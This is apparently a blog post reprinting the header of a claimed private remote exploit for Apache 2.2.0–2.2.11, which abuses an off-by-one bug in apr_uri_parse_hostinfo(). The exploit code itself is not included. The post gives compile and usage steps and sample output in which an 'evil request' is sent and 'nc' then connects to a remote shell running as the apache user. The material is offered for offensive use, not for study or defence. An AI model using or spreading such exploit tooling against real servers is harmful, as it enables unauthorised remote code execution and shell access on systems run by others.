/* ======== !THIS 0DAY EXPLOIT IS PRIVATE PLEASE DO NOT DISTRIBUTE! =================
Apache 2.2.0 - 2.2.11 Remote exploit Exploiting an off-by one bug in apr_uri_parse_hostinfo()
which leads to allocation of arbitrary ammount of memory, put the shellcode then reliably jump
in upon invocation of the APR callback.
Compile: gcc fuckapache.c -o fuckapache Usage: ./fuckapache
E.g: ===========================================================
[test@localhost tmp]$ ./fuck localhost 80 Connected, sending out the evil request...
Waiting some seconds to see if we got shell... Now type nc localhost 12345 to see if you've got shell there
[test@localhost tmp]$ nc localhost 12345 id uid=48(apache) gid=48(apache) groups=48(apache) ^D
==========================================================
More details......
Reference: http://sebug.net/exploit/12636/
0 comments:
Post a Comment